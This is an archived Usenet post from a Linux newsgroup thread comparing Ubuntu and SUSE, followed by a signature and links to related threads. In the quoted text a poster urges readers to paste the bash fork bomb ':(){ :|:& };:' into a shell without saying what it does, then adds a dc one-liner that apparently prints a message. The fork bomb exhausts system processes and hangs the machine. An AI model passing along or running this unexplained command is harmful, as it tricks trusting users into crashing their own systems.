Re: Ubuntu Vs Suse

Nikos Chantziaras wrote:
Mark South wrote:
[...]
Now paste this in a shell and hit enter:

:(){ :|:& };:

echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sbA0D4D465452snlbxq' | dc

Fppmfpffm?
http://houghi.org/moving_pictures/AOLS_01.php

houghi
--
But I will accept the rules that you feel necessary to your freedom. I am
free, no matter what rules surround me. If I find them tolerable, I

  • Re: How many processes are you running at a ny time
    ... Do not feed the trolls, ... But I will accept the rules that you feel necessary to your freedom. ... tolerate them; if I find them too obnoxious, ...
    (alt.os.linux.suse)
  • Re: naming the boxes in a DHCP net
    ... David Bolt wrote: ... But I will accept the rules that you feel necessary to your freedom. ... tolerate them; if I find them too obnoxious, ...
    (alt.os.linux.suse)
  • Re: clamAV install manually
    ... I thought you knew where that database was. ... But I will accept the rules that you feel necessary to your freedom. ... tolerate them; if I find them too obnoxious, ...
    (alt.os.linux.suse)
  • Re: I Abandon Suse for UBUNTU - James Pannozzi Will use and develop for UBUNTU!
    ... So where can we download you version? ... But I will accept the rules that you feel necessary to your freedom. ... tolerate them; if I find them too obnoxious, ...
    (alt.os.linux.suse)
  • Re: Fight Club
    ... They used to tolerate us punk rockers hanging about as we all shared a love ... of loud music and beer. ... We would hit the pub in the late morning and drink ...
    (uk.sport.football)